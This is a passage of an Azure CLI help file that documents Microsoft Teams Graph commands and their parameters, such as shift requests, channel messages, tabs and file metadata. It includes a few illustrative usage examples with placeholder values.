recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
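    examples:
      # Illustrative sketch only: --team-id is an assumed flag name not documented in this file; the
      # --time-off-reasons keys come from the parameter help above and the values are placeholders.
      - name: Add a time-off reason to a team schedule (illustrative placeholder values)
        text: |-
               az teams team update-schedule --team-id "{team-id}" --time-off-reasons \
display-name="Vacation" icon-type="plane" is-active=true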
"""
helps['teams team-channel'] = """
type: group
short-summary: Manage team channel with teams_v1_0
"""
helps['teams team-channel create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team-channel create-message'] = """
type: command
short-summary: "Create new navigation property to messages for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of \
the image specified, ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format. audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard \
object. application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an \
AnimationCard object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property to an AudioCard object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property to a VideoCard object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object. application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object. application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object. application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
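    examples:
      # Illustrative sketch only: --team-id and --channel-id are assumed flag names not documented in this file;
      # the --body content and content-type keys come from the parameter help above and the values are placeholders.
      - name: Post a simple HTML message to a channel (illustrative placeholder values)
        text: |-
               az teams team-channel create-message --team-id "{team-id}" --channel-id "{channel-id}" \
--body content="<p>Hello <b>team</b>!</p>" content-type="html"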
"""
helps['teams team-channel create-tab'] = """
type: command
short-summary: "Create new navigation property to tabs for teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
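    examples:
      # Illustrative sketch only: --team-id, --channel-id, and --display-name are assumed flag names not documented
      # in this file; the --configuration keys come from the parameter help above and the values are placeholders.
      - name: Add a website tab to a channel (illustrative placeholder values)
        text: |-
               az teams team-channel create-tab --team-id "{team-id}" --channel-id "{channel-id}" \
--display-name "Team Wiki" --configuration content-url="https://contoso.example.com/wiki" \
website-url="https://contoso.example.com/wiki" entity-id="wiki-tab-01"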
"""
helps['teams team-channel delete-file-folder'] = """
type: command
short-summary: "Delete navigation property filesFolder for teams."
"""
helps['teams team-channel delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team-channel delete-message'] = """
type: command
short-summary: "Delete navigation property messages for teams."
"""
helps['teams team-channel delete-tab'] = """
type: command
short-summary: "Delete navigation property tabs for teams."
"""
helps['teams team-channel list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-channel list-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-channel list-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-channel show-file-folder'] = """
type: command
short-summary: "Get filesFolder from teams."
"""
helps['teams team-channel show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-channel show-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-channel show-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-channel update-file-folder'] = """
type: command
short-summary: "Update the navigation property filesFolder in teams."
parameters:
- name: --sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-application
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-device
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-user
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --audio
short-summary: "audio"
long-summary: |
Usage: --audio album=XX album-artist=XX artist=XX bitrate=XX composers=XX copyright=XX disc=XX \
disc-count=XX duration=XX genre=XX has-drm=XX is-variable-bitrate=XX title=XX track=XX track-count=XX year=XX
album: The title of the album for this audio file.
album-artist: The artist named on the album for the audio file.
artist: The performing artist for the audio file.
bitrate: Bitrate expressed in kbps.
composers: The name of the composer of the audio file.
copyright: Copyright information for the audio file.
disc: The number of the disc this audio file came from.
disc-count: The total number of discs in this album.
duration: Duration of the audio file, expressed in milliseconds
genre: The genre of this audio file.
has-drm: Indicates if the file is protected with digital rights management.
is-variable-bitrate: Indicates if the file is encoded with a variable bitrate.
title: The title of the audio file.
track: The number of the track on the original disc for this audio file.
track-count: The total number of tracks on the original disc for this audio file.
year: The year the audio file was recorded.
- name: --file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --file-system-info created-date-time=XX last-accessed-date-time=XX last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --image
short-summary: "image"
long-summary: |
Usage: --image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --location
short-summary: "geoCoordinates"
long-summary: |
Usage: --location altitude=XX latitude=XX longitude=XX
altitude: Optional. The altitude (height), in feet, above sea level for the item. Read-only.
latitude: Optional. The latitude, in decimal, for the item. Read-only.
longitude: Optional. The longitude, in decimal, for the item. Read-only.
- name: --photo
short-summary: "photo"
long-summary: |
Usage: --photo camera-make=XX camera-model=XX exposure-denominator=XX exposure-numerator=XX f-number=XX \
focal-length=XX iso=XX orientation=XX taken-date-time=XX
camera-make: Camera manufacturer. Read-only.
camera-model: Camera model. Read-only.
exposure-denominator: The denominator for the exposure time fraction from the camera. Read-only.
exposure-numerator: The numerator for the exposure time fraction from the camera. Read-only.
f-number: The F-stop value from the camera. Read-only.
focal-length: The focal length from the camera. Read-only.
iso: The ISO value from the camera. Read-only.
orientation: The orientation value from the camera. Writable on OneDrive Personal.
taken-date-time: Represents the date and time the photo was taken. Read-only.
- name: --publication
short-summary: "publicationFacet"
long-summary: |
Usage: --publication level=XX version-id=XX
level: The state of publication for this document. Either published or checkout. Read-only.
version-id: The unique identifier for the version that is visible to the current caller. Read-only.
- name: --microsoft-graph-sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --microsoft-graph-sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX \
site-url=XX tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --video
short-summary: "video"
long-summary: |
Usage: --video audio-bits-per-sample=XX audio-channels=XX audio-format=XX audio-samples-per-second=XX \
bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --subscriptions
short-summary: "The set of subscriptions on the item. Only supported on the root of a drive."
long-summary: |
Usage: --subscriptions application-id=XX change-type=XX client-state=XX creator-id=XX \
encryption-certificate=XX encryption-certificate-id=XX expiration-date-time=XX include-resource-data=XX \
latest-supported-tls-version=XX lifecycle-notification-url=XX notification-url=XX resource=XX id=XX
application-id: Identifier of the application used to create the subscription. Read-only.
change-type: Required. Indicates the type of change in the subscribed resource that will raise a change \
notification. The supported values are: created, updated, deleted. Multiple values can be combined using a \
comma-separated list. Note: Drive root item and list change notifications support only the updated changeType. User and \
group change notifications support updated and deleted changeType.
client-state: Optional. Specifies the value of the clientState property sent by the service in each change \
notification. The maximum length is 128 characters. The client can check that the change notification came from the \
service by comparing the value of the clientState property sent with the subscription with the value of the \
clientState property received with each change notification.
creator-id: Identifier of the user or service principal that created the subscription. If the app used \
delegated permissions to create the subscription, this field contains the id of the signed-in user the app called on \
behalf of. If the app used application permissions, this field contains the id of the service principal corresponding \
to the app. Read-only.
encryption-certificate: A base64-encoded representation of a certificate with a public key used to encrypt \
resource data in change notifications. Optional. Required when includeResourceData is true.
encryption-certificate-id: A custom app-provided identifier to help identify the certificate needed to \
decrypt resource data. Optional.
expiration-date-time: Required. Specifies the date and time when the webhook subscription expires. The \
time is in UTC, and can be an amount of time from subscription creation that varies for the resource subscribed to. \
See the Microsoft Graph subscription documentation for the maximum supported subscription length for each resource.
include-resource-data: When set to true, change notifications include resource data (such as content of a \
chat message). Optional.
notification-url: Required. The URL of the endpoint that will receive the change notifications. This URL \
must make use of the HTTPS protocol.
resource: Required. Specifies the resource that will be monitored for changes. Do not include the base URL \
(https://graph.microsoft.com/v1.0/). See the possible resource path values for each supported resource.
id: Read-only.
Multiple actions can be specified by using more than one --subscriptions argument.
- name: --versions
short-summary: "The list of previous versions of the item. For more info, see [getting previous versions][]. \
Read-only. Nullable."
long-summary: |
Usage: --versions content=XX size=XX last-modified-by=XX last-modified-date-time=XX publication=XX id=XX
content: The content stream for this version of the item.
size: Indicates the size of the content stream for this version of the item.
last-modified-by: identitySet
last-modified-date-time: Date and time the version was last modified. Read-only.
publication: publicationFacet
id: Read-only.
Multiple actions can be specified by using more than one --versions argument.
- name: --sharepoint-ids1
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids1 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application1
short-summary: "identity"
long-summary: |
Usage: --application1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device1
short-summary: "identity"
long-summary: |
Usage: --device1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user1
short-summary: "identity"
long-summary: |
Usage: --user1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --application2
short-summary: "identity"
long-summary: |
Usage: --application2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device2
short-summary: "identity"
long-summary: |
Usage: --device2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user2
short-summary: "identity"
long-summary: |
Usage: --user2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --content-type
short-summary: "contentTypeInfo"
long-summary: |
Usage: --content-type id=XX name=XX
id: The id of the content type.
name: The name of the content type.
- name: --sharepoint-ids2
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids2 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --fields
short-summary: "fieldValueSet"
long-summary: |
Usage: --fields id=XX
id: Read-only.
- name: --microsoft-graph-workbook-application
short-summary: "workbookApplication"
long-summary: |
Usage: --microsoft-graph-workbook-application calculation-mode=XX id=XX
calculation-mode: Returns the calculation mode used in the workbook. Possible values are: Automatic, \
AutomaticExceptTables, Manual.
id: Read-only.
- name: --functions
short-summary: "workbookFunctions"
long-summary: |
Usage: --functions id=XX
id: Read-only.
- name: --microsoft-graph-file-system-info-file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --microsoft-graph-file-system-info-file-system-info created-date-time=XX last-accessed-date-time=XX \
last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --microsoft-graph-image
short-summary: "image"
long-summary: |
Usage: --microsoft-graph-image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --package
short-summary: "package"
long-summary: |
Usage: --package type=XX
type: A string indicating the type of package. While oneNote is the only currently defined value, you \
should expect other package types to be returned and handle them accordingly.
- name: --sharepoint-ids3
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids3 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --special-folder
short-summary: "specialFolder"
long-summary: |
Usage: --special-folder name=XX
            name: The unique identifier for this item in the /drive/special collection.
- name: --microsoft-graph-video
short-summary: "video"
long-summary: |
Usage: --microsoft-graph-video audio-bits-per-sample=XX audio-channels=XX audio-format=XX \
audio-samples-per-second=XX bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --view
short-summary: "folderView"
long-summary: |
Usage: --view sort-by=XX sort-order=XX view-type=XX
sort-by: The method by which the folder should be sorted.
sort-order: If true, indicates that items should be sorted in descending order. Otherwise, items should be \
sorted ascending.
view-type: The type of view that should be used to represent the folder.
- name: --hashes
short-summary: "hashes"
long-summary: |
Usage: --hashes crc32-hash=XX quick-xor-hash=XX sha1-hash=XX sha256-hash=XX
crc32-hash: The CRC32 value of the file in little endian (if available). Read-only.
quick-xor-hash: A proprietary hash of the file that can be used to determine if the contents of the file \
have changed (if available). Read-only.
sha1-hash: SHA1 hash for the contents of the file (if available). Read-only.
sha256-hash: SHA256 hash for the contents of the file (if available). Read-only.
"""
helps['teams team-channel update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team-channel update-message'] = """
type: command
short-summary: "Update the navigation property messages in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
            content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of the \
image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the contentUrl \
field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, for example \
audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich \
card attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an AnimationCard \
object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content property to an AudioCard \
object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content property to a VideoCard \
object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a HeroCard object. \
application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a ThumbnailCard object. \
application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a ReceiptCard object. \
application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
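    examples:
      # Hypothetical sketch only: the --team-id, --channel-id and --chat-message-id identifier arguments are assumed from
      # the command path and are not documented in this entry; only --body is taken from the parameters above.
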